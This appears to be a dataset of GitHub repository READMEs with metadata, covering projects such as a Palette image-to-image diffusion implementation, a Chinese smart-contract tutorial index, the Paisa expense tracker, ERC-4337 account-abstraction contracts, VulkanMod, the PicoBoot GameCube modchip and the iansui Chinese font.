| Collection of advice for prospective and current PhD students | phd-students,phd-application,research,computer-science,machine-learning | 0 | 4 | 6 | 40 | 0 | 1 | 0 |
Janspiry/Palette-Image-to-Image-Diffusion-Models | # Palette: Image-to-Image Diffusion Models
[Paper](https://arxiv.org/pdf/2111.05826.pdf ) | [Project](https://iterative-refinement.github.io/palette/ )
## Brief
This is an unofficial implementation of **Palette: Image-to-Image Diffusion Models** by **Pytorch**, and it is mainly inherited from its super-resolution version [Image-Super-Resolution-via-Iterative-Refinement](https://github.com/Janspiry/Image-Super-Resolution-via-Iterative-Refinement). The code template is from my another seed project: [distributed-pytorch-template](https://github.com/Janspiry/distributed-pytorch-template).
There are some implementation details with paper descriptions:
- We adapted the U-Net architecture used in `Guided-Diffusion`, which gives a substantial boost to sample quality.
- We used the attention mechanism in low-resolution features (16×16) like vanilla `DDPM`.
- We encode $\gamma$ rather than $t$ in `Palette` and embed it with an affine transformation.
- We fix the variance $\Sigma_\theta(x_t, t)$ to a constant during inference as described in `Palette`.
## Status
### Code
- [x] Diffusion Model Pipeline
- [x] Train/Test Process
- [x] Save/Load Training State
- [x] Logger/Tensorboard
- [x] Multiple GPU Training (DDP)
- [x] EMA
- [x] Metrics (now for FID, IS)
- [x] Dataset (now for inpainting, uncropping, colorization)
- [x] Google colab script 🌟(now for inpainting)
### Task
I try to finish the following tasks in order:
- [x] Inpainting on [CelebaHQ](https://drive.google.com/drive/folders/1CjZAajyf-jIknskoTQ4CGvVkAigkhNWA?usp=sharing)🚀 ([Google Colab](https://colab.research.google.com/drive/1wfcd6QKkN2AqZDGFKZLyGKAoI5xcXUgO#scrollTo=8VFpuekybeQK))
- [x] Inpainting on [Places2 with 128×128 centering mask](https://drive.google.com/drive/folders/1fLyFtrStfEtyrqwI0N_Xb_3idsf0gz0M?usp=sharing)🚀
The follow-up experiment is uncertain, due to lack of time and GPU resources:
- [ ] Uncropping on Places2
- [ ] Colorization on ImageNet val set
## Results
The DDPM model requires significant computational resources, and we have only built a few example models to validate the ideas in this paper.
### Visuals
#### Celeba-HQ
Results with 200 epochs and 930K iterations, and the first 100 samples in [centering mask](https://drive.google.com/drive/folders/10zyHZtYV5vCht2MGNCF8WzpZJT2ae2RS?usp=sharing) and [irregular mask](https://drive.google.com/drive/folders/1vmSI-R9J2yQZY1cVkSSZlTYil2DprzvY?usp=sharing).
| ![Process_02323](misc//image//Process_02323.jpg) | ![Process_02323](misc//image//Process_26190.jpg) |
| ------------------------------------------------ | ---- |
#### Places2 with 128×128 centering mask
Results after 16 epochs and 660K iterations; several **picked** samples are available for the [centering mask](https://drive.google.com/drive/folders/1XusKO0_M6GUfPG-FOlID0Xcp0SiexKNe?usp=sharing).
| ![Mask_Places365_test_00209019.jpg](misc//image//Mask_Places365_test_00209019.jpg) | ![Mask_Places365_test_00143399.jpg](misc//image//Mask_Places365_test_00143399.jpg) | ![Mask_Places365_test_00263905.jpg](misc//image//Mask_Places365_test_00263905.jpg) | ![Mask_Places365_test_00144085.jpg](misc//image//Mask_Places365_test_00144085.jpg) |
| ------------------------------------------------------------ | ------------------------------------------------------------ | ------------------------------------------------------------ | ---- |
| ![Out_Places365_test_00209019](misc//image//Out_Places365_test_00209019.jpg) | ![Out_Places365_test_00143399.jpg](misc//image//Out_Places365_test_00143399.jpg) | ![Out_Places365_test_00263905.jpg](misc//image//Out_Places365_test_00263905.jpg) | ![Out_Places365_test_00144085.jpg](misc//image//Out_Places365_test_00144085.jpg) |
#### Uncropping on Places2
Results after 8 epochs and 330K iterations; several **picked** samples are available for [uncropping](https://drive.google.com/drive/folders/1tC3B8ayaadhXAJrOCTrw15R8t84REPWJ?usp=sharing).
| ![Process_Places365_test_00309553](misc//image//Process_Places365_test_00309553.jpg) | ![Process_Places365_test_00042384](misc//image//Process_Places365_test_00042384.jpg) |
| ------------------------------------------------ | ---- |
### Metrics
| Tasks | Dataset | EMA | FID(-) | IS(+) |
| -------------------- | ----------- | -------- | ---- | -------------------- |
| Inpainting with centering mask | Celeba-HQ | False | 5.7873 | 3.0705 |
| Inpainting with irregular mask | Celeba-HQ | False | 5.4026 | 3.1221 |
## Usage
### Environment
```bash
pip install -r requirements.txt
```
### Pre-trained Model
| Dataset | Task | Iterations | GPUs×Days×Bs | URL |
| --------- | ---------- | ---------- | ------------ | ------------------------------------------------------------ |
| Celeba-HQ | Inpainting | 930K | 2×5×3 | [Google Drive](https://drive.google.com/drive/folders/13YZ2UAmGJ-b7DICr-FDAPM7gctreJEoH?usp=sharing) |
| Places2 | Inpainting | 660K | 4×8×10 | [Google Drive](https://drive.google.com/drive/folders/1Vz_HC0LcpV6yMLOd-SXyoaqJHtxyPBxZ?usp=sharing) |
**Bs** indicates the batch size per GPU.
### Data Prepare
We get most of the datasets from Kaggle, which may differ slightly from the official versions; you can also download them from the official websites.
- [CelebA-HQ resized (256x256) Kaggle](https://www.kaggle.com/datasets/badasstechie/celebahq-resized-256x256)
- [Places2 Official](http://places2.csail.mit.edu/download.html) | [Places2 Kaggle](https://www.kaggle.com/datasets/nickj26/places2-mit-dataset?resource=download)
- [ImageNet Official](https://www.image-net.org/download.php)
We use the default division of these datasets for training and evaluation. The file lists we use can be found in [Celeba-HQ](https://drive.google.com/drive/folders/1-ym2Mi2jVKdWmWYKJ_L2TWXjUQh8z7H-?usp=sharing), [Places2](https://drive.google.com/drive/folders/11Qj2MtRfiD7LbKEveYwOLaiX62lm_2ww?usp=sharing).
After you have prepared your own data, modify the corresponding config file to point to it. Take the following as an example:
```yaml
"which_dataset": { // import designated dataset using arguments
"name": ["data.dataset", "InpaintDataset"], // import Dataset() class
"args":{ // arguments to initialize dataset
"data_root": "your data path",
"data_len": -1,
"mask_mode": "hybrid"
}
},
```
More choices for the **dataloader** and **validation split** can also be found in the `datasets` part of the config file.
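For reference, the `"name": [module, class]` entry above is a common dynamic-import idiom. Below is a hedged sketch of how such a config entry can be resolved; the helper name is hypothetical and the actual loader in this repository may differ.

```python
import importlib

def init_obj(which_dataset: dict):
    """Hypothetical helper: the first element of "name" is a module path and
    the second is a class inside it; "args" are passed to the constructor."""
    module_name, class_name = which_dataset["name"]
    cls = getattr(importlib.import_module(module_name), class_name)
    return cls(**which_dataset.get("args", {}))

# Example usage (paths and arguments are placeholders):
# dataset = init_obj({
#     "name": ["data.dataset", "InpaintDataset"],
#     "args": {"data_root": "your data path", "data_len": -1, "mask_mode": "hybrid"},
# })
```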
### Training/Resume Training
1. Download the checkpoints from the given links.
2. Set `resume_state` in the config file to the directory of a previous checkpoint. Take the following as an example; this directory contains the training states and saved models:
```yaml
"path": { //set every part file path
"resume_state": "experiments/inpainting_celebahq_220426_150122/checkpoint/100"
},
```
3. Set your network label in the `load_everything` function of `model.py`; the default is **Network**. With the tutorial settings, the optimizers and models will be loaded from 100.state and 100_Network.pth respectively.
```python
netG_label = self.netG.__class__.__name__
self.load_network(network=self.netG, network_label=netG_label, strict=False)
```
4. Run the script:
```bash
python run.py -p train -c config/inpainting_celebahq.json
```
We tested the U-Net backbones used in `SR3` and `Guided Diffusion`, and the `Guided Diffusion` one has more robust performance in our current experiments. More choices for the **backbone**, **loss** and **metric** can be found in the `which_networks` part of the config file.
### Test
1. Modify the config file to point to your data, following the steps in the **Data Prepare** part.
2. Set your model path, following the steps in the **Training/Resume Training** part.
3. Run the script:
```bash
python run.py -p test -c config/inpainting_celebahq.json
```
### Evaluation
1. Create two folders holding the ground-truth images and the sample images; their file names need to correspond to each other (a quick sanity check is sketched below).
2. Run the script:
```bash
python eval.py -s [ground image path] -d [sample image path]
```
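The file-name correspondence required in step 1 can be sanity-checked with a short script like the following (not part of the repository; the folder paths are placeholders):

```python
import os

# Quick check that the two folders passed to eval.py contain matching file names.
gt_dir = "path/to/ground_truth"
sample_dir = "path/to/samples"

gt_names = set(os.listdir(gt_dir))
sample_names = set(os.listdir(sample_dir))
unmatched = sorted(gt_names ^ sample_names)  # names present in only one folder
if unmatched:
    print(f"{len(unmatched)} files have no counterpart, e.g. {unmatched[:5]}")
else:
    print(f"OK: {len(gt_names)} matching pairs")
```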
## Acknowledgements
Our work is based on the following theoretical works:
- [Denoising Diffusion Probabilistic Models](https://arxiv.org/pdf/2006.11239.pdf)
- [Palette: Image-to-Image Diffusion Models](https://arxiv.org/pdf/2111.05826.pdf)
- [Diffusion Models Beat GANs on Image Synthesis](https://arxiv.org/abs/2105.05233)
and we benefit a lot from the following projects:
- [openai/guided-diffusion](https://github.com/openai/guided-diffusion)
- [LouisRouss/Diffusion-Based-Model-for-Colorization](https://github.com/LouisRouss/Diffusion-Based-Model-for-Colorization)
| Unofficial implementation of Palette: Image-to-Image Diffusion Models by Pytorch | ddpm,image-restoration,ddp,implementation,pytorch,diffusion-model | 0 | 2 | 3 | 39 | 24 | 1 | 0 |
33357/smartcontract-apps | # smartcontract-apps
学习不是目的,工作不是终点。
## 前言
大家好,我是 33357,目前是一名智能合约工程师。
我从事这门行业,不是为了什么理想,只是为了改变自己的生活。而从某种意义上说,我的确实现了。如果没有从事智能合约,我可能还在 996、考研、为了大厂面试刷题。我应该没有机会在这里,平静地和大家说着这些话。
还记得 21 年 5 月的时候,学校里考研的,找工作的,留级的,都已经定好了。只有我还什么都没有,急得快哭了。上年秋招的时候虽然面试了好几个互联网大厂,但没一个过的。那时候的我孤注一掷,研究 DAPP,凭此投了好几家区块链公司,居然成功了。
第一份工作其实还算顺利,老板人也不坏,但我并不能安心。外地工作必然要买房,房贷那就是身上的一座山,让我几乎看不到未来的模样。思考再三,我在年底辞职了,因为我知道留不住。
接下来是自己干活。我接过项目,也做项目,但接项目没渠道,自己做的没人气。倒是研究机器人赚了点钱,可以勉强维持生活。自己维持现金流其实蛮难的,如履薄冰,最后机器人也做不下去了,只能接着找工作。
22 年中的行业市场很坏,我投了几十家公司,只有五六个面试,最后一个也没去成。最后我找到了一家初创团队,可以远程工作,才结束了这段时期。老实说,从这个时段开始,我才真正摸到了一些行业的门道。
XEN 对我来说是一个神奇的项目。2 月的时候,我发现了 RND,而 XEN 几乎和 RND 有异曲同工之妙。我之前在智能合约上摸索出来的经验在 XEN 上发挥了巨大的功效,赚到了一笔钱,足够我支持自己安稳度过整个行业的熊市了。
接下来,我要开始一段新的人生进度。回想起来,如果和一年半之前有什么不同的话,那就是我不再会去为了生计而工作了,打工人毕竟是没有前途的。区块链的周期依然存在,如果我能从现在开始为行业做出点事情,那么在未来的牛市上,应该会有更大的回报。
祝大家有所收获。
## 通知推送
twitter:[33357xyz](https://twitter.com/33357xyz)
## 加入社群
tg: [smartcontractapps](https://t.me/smartcontractapps)
wx:_33357xyz(备注sc-apps)
<!-- discord: [智能合约应用](https://discord.gg/YjsvmyG84H) -->
## 特别篇
这是一些具有指导性的文章,可以为你指明前进的方向。
<!-- - [Web3 自由之道](./Special/Web3FreeDao.md) -->
- [如何入门智能合约开发](./Special/New.md)
- [如何在区块链领域用技术赚钱](./Special/Earn.md)
- [如何成为资深智能合约工程师](./Special/Dev.md)
- [如何成为躺着赚钱的科学家](./Special/Scientist.md)
- [选择什么语言编写智能合约](./Special/Language.md)
## GAS 排名合约分析
[GasTracker](https://etherscan.io/gastracker) 排名靠前的合约具有较高的研究价值
- [通过 GAS 排行搜寻新机会](./Gas/GasSearch.md)
- [Uniswap Universal Router 之 Permit2 合约分析](./Gas/UniswapUniversalRouter_Permit2.md)
## EIPS
- [反闪电贷协议 EIP7690](./EIPS/eip7690.md)
- [EIP7511 最小代理合约解析](./EIPS/eip7511.md)
- [比最小代理更小的代理合约](./EIPS/smallerProxy.md)
- [坎昆升级简析](./EIPS/dencun.md)
## 会议篇
- [黑客松对开发者有什么用](./Meeting/Hackathon.md)
- [2023年香港 web3 嘉年华](./Meeting/Web3HongKong.md)
## 智能合约事件分析
有了区块链技术的基础,在智能合约上编程,真正做到了“code is law,code is money”。这里会收集一些实时的智能合约事件及其技术和模式的分析。
<!-- - [XEN,又一次的 GAS 换真金](./Event/Xen.md) -->
- [让 EVM 再次伟大,用智能合约保证 MEME 的安全](./Event/meme.md)
- [当去中心化遇到攻击: BSC停机事件](./Event/WhenAttackDecentralization.md)
- [又是用户转移资产权限被盗,如何确保加密资产安全?](./Event/ContractApproveHack.md)
- [RandomDAO事件](./Event/RandomDAO.md)
- [EIP1559下的GAS费设置](./Event/EIP1559_GAS.md)
- [X2Y2: 必须修改的中心化NFT挂单奖励机制](./Event/X2Y2_DecentralizedOrderReward.md)
- [链上通信协议](./Event/OnChainMessageProtocol.md)
- [CheapSwap协议的诞生](./Event/CheapSwap.md)
- [以太坊POS合并带来的赚钱机会](./Event/PosMerge.md)
- [ETHW重放攻击](./Event/Replay.md)
<!-- - [0转账攻击](./Event/0TransferAttack.md) -->
## 智能合约应用
- DEX
去中心化交易所,又称DEX,是指基于区块链上智能合约实现的代币交易类应用。用户可以在区块链上完成“代币定价-支付代币-获得代币”的完整业务流程,实现无需托管的代币交易。但同时用户也会受到交易深度不够、合约被黑客攻击和链上手续费高昂等问题的困扰。
- [Uniswap_v2](./Apps/DEX/Uniswap_v2/)
- [Uniswap_v4](./Apps/DEX/Uniswap_v4/)
- Loan
去中心化借贷,是DEFI的一种重要形式,是一种基于区块链上智能合约实现的代币借贷类应用。用户可以在区块链上完成“代币存借-收益计算-获得/支付利息”的完整业务流程,实现无需认证的自动化超抵押借贷。
- [Compound](./Apps/Loan/Compound/)
## Solidity 使用技巧
SOLIDITY 是目前使用最广泛的 EVM 智能合约语言,通过学习它可以了解智能合约的运行机制,并设计出更加符合业务的 DAPP。
- 100 个 Solidity 使用技巧
提示:阅读本教程需要一定的 solidity 基础知识。为了帮助智能合约开发者更好地使用 Solidity,我会在讲解代码的同时给出测试用例,帮助开发者在实践中更好地理解 Solidity 的特性。在这里,我会使用 [https://remix.ethereum.org/](https://remix.ethereum.org/) 作为 Solidity 的开发工具给大家演示,Soldity 版本为 0.8.12。
- [1. 合约重入攻击](./Solidity/Solidity_100/1_Reentrancy_Attack/)
- [2. 交易回滚攻击](./Solidity/Solidity_100/2_Transaction_Rollback_Attack/)
- 其他技巧
- [不受单个矿工控制的链上随机数生成方法](./Solidity/Other/random.md)
- [最省GAS链上排序](./Solidity/Other/Save_Gas_Sort.md)
- [NFT 所有者 tokenID 快速查询](./Solidity/Other/NFT_Search.md)
- [Solidity 智能合约开发流程](./Solidity/Other/Solidity_Development_Process.md)
- [如何预测最低的 GasPrice](./Solidity/Other/Lowest_GasPrice.md)
## 一点思考
如何使用技术改善自己的人生,这是每个从业者要解决的首要问题。
- [2022年中展望](./Outlook/2022_MidYear.md)
<!-- - [33357的目标](./Outlook/Target.md) -->
<!-- - [人生的边际效应](./Outlook/Marginal_Utility.md) -->
<!-- - [2022年末总结](./Outlook/2022_End.md) -->
## 生态研究
- [以太坊扩容:L2 详解](./Search/L2.md)
- [BRC20 解析](./Search/brc20.md)
- [ethscriptions 铭文链和哑合约](./Search/ethscriptions.md)
## 套利机器人
在区块链上实现盈利的机器人有不少种类,如果策略得当的话可以实现躺赚目标。这里会记录一些机器人的类型和实现。
- [搬砖交易机器人](./Robot/Moving_Exchange_Robot/)
- [三明治交易机器人](./Robot/Sandwich_Exchange_Robot/)
- [抢跑机器人](./Robot/Running_Robot/)
- [MEV 是在为谁工作](./Robot/MEV_Who_are_you_working_for.md)
- [一个通用的套利交易模型](./Robot/TradeModel.md)
## 维护员
[@33357](https://github.com/33357) | 这是一个面向中文社区,分析市面上智能合约应用的架构与实现的仓库。 | null | 0 | 2 | 35 | 166 | 0 | 1 | 0 |
h4h13/Paisa | <p align="center">
<a href="https://retromusic.app">
<img src="assets\images\icon.png" height="128">
<h1 align="center">Paisa - Expense Tracker</h1>
</a>
</p>
<p align="center">
<a href="https://flutter.dev/" style="text-decoration:none" area-label="flutter">
<img src="https://img.shields.io/badge/Platform-Flutter%203.22.2-blue">
</a>
<a href="https://github.com/RetroMusicPlayer/Paisa/releases/tag/v6.1.4" style="text-decoration:none" area-label="flutter">
<img src="https://img.shields.io/badge/Version-6.1.4-orange">
</a>
<a href="https://play.google.com/store/apps/details?id=dev.hemanths.paisa" style="text-decoration:none" area-label="play store">
<img src="https://img.shields.io/badge/Download-Google%20Play-green">
</a>
<a href="https://apps.microsoft.com/store/detail/9NQ2KR46N764?launch=true&mode=mini" style="text-decoration:none" area-label="windows">
<img src="https://img.shields.io/badge/Download-Micrsoft%20Store-red">
</a>
</p>
<p align="center">
<h2> Material design expense manager</h2>
</p>
### ⚠ Join [Telegram Group](https://t.me/app_paisa) for important updates
### Screenshots
#### Mobile
| <img src="paisa-images/flutter_01.png" width="200"/> | <img src="paisa-images/flutter_02.png" width="200"/> | <img src="paisa-images/flutter_04.png" width="200"/> | <img src="paisa-images/flutter_03.png" width="200"/> |
| :--------------------------------------------------: | :--------------------------------------------------: | :--------------------------------------------------: | :--------------------------------------------------: |
| Home | Accounts | Categories | Budget overview |
#### Foldable
| <img src="paisa-images/Screenshot_1667485291.png" width="200"/> | <img src="paisa-images/Screenshot_1667485297.png" width="200"/> | <img src="paisa-images/Screenshot_1667485299.png" width="200"/> | <img src="paisa-images/Screenshot_1667485301.png" width="200"/> |
| :-------------------------------------------------------------: | :-------------------------------------------------------------: | :-------------------------------------------------------------: | :-------------------------------------------------------------: |
| Home | Accounts | Categories | Budget overview |
#### Tablet & Desktop
| <img src="paisa-images/Screenshot_1667485280.png" width="200"/> | <img src="paisa-images/Screenshot_1667485342.png" width="200"/> | <img src="paisa-images/Screenshot_1667485319.png" width="200"/> | <img src="paisa-images/Screenshot_1667485320.png" width="200"/> |
| :-------------------------------------------------------------: | :-------------------------------------------------------------: | :-------------------------------------------------------------: | :-------------------------------------------------------------: |
| Home | Accounts | Categories | Budget overview |
### Expense Tracking
- Tracking expenses, incomes & deposits
- Account & budget overview
- Manage categories
### Steps to translate
1. Create an `.arb` file at `lib/localization/app_<language_code>.arb`, for example `app_en.arb`
2. Copy all translations from `app_en.arb` to the created file and remove all keys annotated with `@` (a helper sketch is shown after these steps)
From
```json
{
"appTitle": "Paisa",
"@appTitle": {
"description": "The app name",
"type": "text",
"placeholders": {}
}
}
```
To
```json
{
"appTitle": "Paisa"
}
```
3. Check `untranslated.json` for any missing keys that still need to be translated
4. Run the app and check the result once
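As referenced in step 2, stripping the `@`-annotated metadata keys can also be automated with a small script like the one below (a hypothetical helper, not part of this repository; the target locale file name is just an example):

```python
import json

# Bootstrap a new locale file from app_en.arb by dropping "@"-annotated metadata keys.
src = "lib/localization/app_en.arb"
dst = "lib/localization/app_de.arb"  # the target locale here is only an example

with open(src, encoding="utf-8") as f:
    entries = json.load(f)

# Keep only the plain translation keys; "@"-prefixed keys hold metadata.
stripped = {key: value for key, value in entries.items() if not key.startswith("@")}

with open(dst, "w", encoding="utf-8") as f:
    json.dump(stripped, f, ensure_ascii=False, indent=2)
```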
### Steps to build project
1. Clone the Flutter Project:
- Use `git clone https://github.com/RetroMusicPlayer/Paisa.git` to download the project from the GitHub repository.
2. Install Dependencies:
- Navigate to the project directory and run `flutter pub get` to install the required dependencies.
3. Run the App:
- Connect a device or emulator and run the app using `flutter run --flavor dev` or through your IDE.
### Download
[<img alt='Get it on Google Play' width=256 height=100 src='https://play.google.com/intl/en_us/badges/static/images/badges/en_badge_web_generic.png'/>](https://play.google.com/store/apps/details?id=dev.hemanths.paisa&hl=en_US&pli=1&pcampaignid=pcampaignidMKT-Other-global-all-co-prtnr-py-PartBadge-Mar2515-1)
[<img width=180 height=100 src="https://get.microsoft.com/images/en-us%20dark.svg" alt="Download Microsoft Store" />](https://apps.microsoft.com/store/detail/9NQ2KR46N764?launch=true&mode=mini)
### License
Copyright (c) 2022, Hemanth Savarala
All rights reserved.
This source code is licensed under the GPLv3-style license found in the
LICENSE file in the root directory of this source tree.
| Expense manager for Android with Material Design | android,blocstatemanagement,clean-architecture,windows,bloc,dart,flutter,injectable,material-design,material-ui | 63 | 34 | 129 | 735 | 46 | 18 | 1 |
eth-infinitism/account-abstraction | Implementation of contracts for [ERC-4337](https://eips.ethereum.org/EIPS/eip-4337) account abstraction via alternative mempool.
# Resources
[Vitalik's post on account abstraction without Ethereum protocol changes](https://medium.com/infinitism/erc-4337-account-abstraction-without-ethereum-protocol-changes-d75c9d94dc4a)
[Discord server](http://discord.gg/fbDyENb6Y9)
[Bundler reference implementation](https://github.com/eth-infinitism/bundler)
[Bundler specification test suite](https://github.com/eth-infinitism/bundler-spec-tests)
| null | null | 4 | 32 | 345 | 384 | 7 | 24 | 1 |
xCollateral/VulkanMod | # <a href="https://github.com/xCollateral/VulkanMod"> <img src="./src/main/resources/assets/vulkanmod/Vlogo.png" width="30" height="30"/> </a> VulkanMod
This is a fabric mod that introduces a brand new **Vulkan** based voxel rendering engine to **Minecraft java** in order to both replace the default OpenGL renderer and bring performance improvements.
### Why?
- Highly experimental project that overhauls and modernizes the internal renderer for Minecraft. <br>
- Updates the renderer from OpenGL 3.2 to Vulkan 1.2. <br>
- Provides a potential reference for a future-proof Vulkan codebase for Minecraft Java. <br>
- Utilizes the VulkanAPI to allow for capabilities not always possible with OpenGL. <br>
- Including reduced CPU Overhead and use of newer, modern hardware capabilities. <br>
### Demonstration Video:
[![Demonstration Video](http://img.youtube.com/vi/sbr7UxcAmOE/0.jpg)](https://youtu.be/sbr7UxcAmOE)
## FAQ
- Remember to check the [Wiki](https://github.com/xCollateral/VulkanMod/wiki) we wrote before asking for support!
## Installation
### Download Links:
- [![CurseForge](https://cf.way2muchnoise.eu/full_635429_downloads.svg?badge_style=flat)](https://www.curseforge.com/minecraft/mc-mods/vulkanmod)
- [![Modrinth Downloads](https://img.shields.io/modrinth/dt/JYQhtZtO?logo=modrinth&label=Modrinth%20Downloads)](https://modrinth.com/mod/vulkanmod/versions)
- [![GitHub Downloads (all assets, all releases)](https://img.shields.io/github/downloads/xCollateral/VulkanMod/total?style=flat-square&logo=github&label=Github%20Downloads)](https://github.com/xCollateral/VulkanMod/releases)
### Install guide:
>1) Install the [fabric modloader](https://fabricmc.net).
>1) Download and put the `Vulkanmod.jar` file into `.minecraft/mods`
>1) Enjoy !
## Useful links
<table>
<tr>
<th> Discord server</th>
<th> Ko-Fi</th>
</tr>
<tr>
<td style="text-align:center">
<a href="https://discord.gg/FVXg7AYR2Q">
<img alt="Discord" align="top" src="https://img.shields.io/discord/963180553547419670?style=flat-square&logo=discord&logoColor=%23FFFFFF&label=Vulkanmod%20official%20discord%20server&labelColor=%235865F2&color=%235865F2">
</a>
</td>
<td>
<a href="https://ko-fi.com/V7V7CHHJV">
<img alt="Static Badge" align="top" src="https://img.shields.io/badge/KoFi-%23ff5e5b?logo=ko-fi&logoColor=%23FFFFFF&link=https%3A%2F%2Fko-fi.com%2FV7V7CHHJV">
</a>
</td>
</tr>
</table>
## Features
### Optimizations:
>- [x] Multiple chunk culling algorithms
>- [x] Reduced CPU overhead
>- [x] Improved GPU performance
>- [x] Indirect Draw mode (reduces CPU overhead)
>- [x] Chunk rendering optimizations
### New changes:
>- [x] Native Wayland support
>- [x] GPU selector
>- [x] Windowed fullscreen mode
>- [x] Revamped graphic settings menu
>- [x] Resizable render frame queue
>- [ ] Shader support
>- [ ] Removed Herobrine
## Notes
- This mod is still in development, please report issues in the [issue tab](https://github.com/xCollateral/VulkanMod/issues) with logs attached!
- This mod isn't just "Minecraft on Vulkan" (e.g. [zink](https://docs.mesa3d.org/drivers/zink.html)); it is a full rewrite of the Minecraft renderer.
| Vulkan renderer mod for Minecraft. | minecraft,vulkan,minecraft-mod,vulkan-renderer | 41 | 5 | 98 | 197 | 130 | 5 | 1 |
webhdx/PicoBoot | <img src="/assets/PicoBoot.png" alt="PicoBoot" align="left"/>
# PicoBoot
This is a long-awaited IPL replacement modchip for the Nintendo GameCube. It's open source, cheap, and easy to install.
Join Discord Server to get support and discuss new features:
[![](https://dcbadge.vercel.app/api/server/fEhyWRPCmb)](https://click.webhdx.dev/discord)
## Features
* it's open source
* uses $4 Raspberry Pi Pico board
* very easy installation, only 5 wires to solder
* programmable via USB cable, without any drivers and programs
* automatically boots any DOL app of your choice
* uses "IPL injection" approach superior to mods like XenoGC
## Video guides and features overview
- [PicoBoot Modchip Will Unleash The POWER of Your Nintendo GAMECUBE! | Installation Guide and Overview](https://www.youtube.com/watch?v=qwL4ZSa0xMo) by [MachoNachoProductions](https://www.youtube.com/c/MachoNachoProductions)
- [This new Gamecube Modchip is a GAMECHANGER - PicoBoot](https://www.youtube.com/watch?v=lfMTLEM0yeQ) by [RockerGaming](https://www.youtube.com/c/RockerGaming)
- [$5 Gamecube IPL Modchip?! Picoboot Dol-001 + Dol-101 Installation / Setup / Showcase](https://www.youtube.com/watch?v=W_9-mSBMBJ4) by [ModzvilleUSA!](https://www.youtube.com/c/ModzvilleUSA)
- [PicoBoot GameCube custom mod chip - make and install your own chip with a Raspberry Pi Pico](https://youtu.be/rDrosSd-nDc) by [Joe Bleeps](https://www.youtube.com/@JoeBleeps)
## Installation guide
Head over to [support.webhdx.dev](https://support.webhdx.dev/gc/picoboot) for [Installation guide](https://support.webhdx.dev/gc/picoboot/installation-guide) and [Troubleshooting tips](https://support.webhdx.dev/gc/picoboot/troubleshooting).
## I appreciate your work. Can I support you in any way?
This project is free and available for everyone. If you want to support it anyway, consider using [:heart: Sponsor](https://github.com/sponsors/webhdx) button.
## Hall of Fame
I'd like to thank the people who helped make PicoBoot possible:
* #gc-forever crew: [Extrems](https://github.com/Extrems), [novenary](https://github.com/9ary), [emu_kidid](https://github.com/emukidid) and others
* [tmbinc](https://github.com/tmbinc) - he started it all 🙏
* happy_bunny - I started my research with his great writeup on [Shuriken Attack](https://www.retro-system.com/shuriken_attack.htm)
* beta testers: [seewood](https://github.com/seewood), [MethodOrMadness](https://github.com/MethodOrMadness), [renanbianchi](https://github.com/renanbianchi)
* content creators: [MachoNachoProductions](https://www.youtube.com/c/MachoNachoProductions), [RockerGaming](https://www.youtube.com/c/RockerGaming), [ModzvilleUSA!](https://www.youtube.com/c/ModzvilleUSA)
* people who sponsored this project
* every PicoBoot enjoyer - it's all about you after all 😉
## Acknowledgements
Some parts of this project use GPL-2.0 licensed code from:
* https://github.com/redolution/iplboot
| Raspberry Pi Pico (RP2040) based IPL replacement modchip for GameCube | gamecube,modchip | 4 | 3 | 9 | 60 | 23 | 2 | 0 |
ButTaiwan/iansui | ![芫荽/iansui](img/iansui_cover.jpg)
# 芫荽 / iansui
An open source Chinese font derived from Klee One (Fontworks).
基於 Fontworks 的 Klee One 衍生的開源繁體中文字型。
## 簡介
Fontworks 的 Klee(クレー)字型原本內建於 macOS,因其兼具楷體筆調、又似仿宋整齊端正,具高易讀性與溫暖外形,廣受中文使用者喜好。然而畢竟是日文字型,雖然字數不少,但排中文時仍有一定程度缺字,一直是可惜之處。
但 2020 年底,Fontworks 忽然以開源授權釋出了 Klee One 字型,震驚字型圈。網路上已有許多其他專案嘗試為 Klee One 補上中文字,如簡體中文補字的 [LXGW WenKai / 霞鹜文楷](https://github.com/lxgw/LxgwWenKai) 與傳統字形補字的 [Klee One 繁體中文版](https://dorawei.xyz/klee-one-tc/) 等。
此專案「芫荽」則是嘗試**盡可能**調整字形貼近教育部標準字體,並補充台客語用字,貼近台灣需求,並適合學齡教育使用(如童書、國字習作等)。
由於原 Klee 的 Regular 偏細而預估使用需求較低,本專案以原 SemiBold 為底製作。
## 最新版本與下載方式
目前最新版本為 1.002,請[點此](ChangeLog.md)查看詳細異動紀錄。
請點選本頁面右側「[Releases](https://github.com/ButTaiwan/iansui/releases)」處的最新發行版本,下載 iansui.zip。解壓縮後安裝裡面的 .ttf 字型檔案即可。
## 收錄字數
* Big5範圍內約8,170字。**注意並沒有包含Big5完整的13,560字。**
* 支援jf當務字集基本包與擴充包所有文字。
* 台、客語漢字(教育部《[臺灣閩南語常用詞辭典](https://twblg.dict.edu.tw/holodict_new/)》《[臺灣客家語常用詞辭典](https://hakkadict.moe.edu.tw/cgi-bin/gs32/gsweb.cgi/login?o=dwebmge&cache=1641872312920)》內所有推薦用字。原則上不收錄異用字。)、常用粵語字。
* 注音符號與方音符號。
* 支援台羅拼音、台語白話字拼音、客語拼音、客語白話字拼音、原住名族語拼音、漢語拼音、馬祖福州話拼音編排。
* 依繁體中文習慣,全形標點符號置中。括弧引號類亦調整為稍比日文原形向中靠攏。
* 數字 7、英文大寫字母 I 亦調整為更貼近台灣教科書的寫法。
* 支援 KK 音標、DJ 音標 KK 音標、DJ 音標需要之所有字母、重音標號,可從下表複製使用:
- KK: ɑæɛəɪɔᴜʌɚɝ aɪaᴜ θʃðʒŋḷṃṇ ‵ʹ͵
- DJ: ɑæəɜɪɔʊʌː aɪaʊ θʃðʒŋ ˈˌ
- 注意因為芫荽的 a 預設是單層,而 Unicode 沒有兩層 a 的字碼,故以標準連字方式來實作。當 a 出現在 ɪᴜʊ 之前時顯示為兩層。故單層 a 也可以不用刻意輸入 ɑ。
![芫荽範例字/iansui](img/iansui_sample.jpg)
## 字形調整原則
本字型**盡可能**調整字形貼近教育部標準字體,包括印刷體形式的斷筆,也都調整為一筆劃。
保留與 Klee 原封不動的字符約僅 3000 字(含調整過異體映射者),超過 4000 字符經過修改,並補字超過 2000 字。
開發時參考《[國字標準字體研訂原則](https://language.moe.gov.tw/001/upload/files/site_content/m0001/biau/c12.htm?open)》之規定,但《[國字標準字體教師手冊](https://language.moe.gov.tw/001/Upload/files/SITE_CONTENT/M0001/STD/c4.htm?open)》部分所述之部分規定不見於通則與分則,先不考慮處理。
因個人審美、人力等因素,以下細節目前決定不修改,或可能與標楷體有些許差異。
* 「又」字不閉口。(標準字體研訂原則規定又字閉口,但又字數量太多,且又第二筆做點時,閉口造形難以處理又不美觀。)
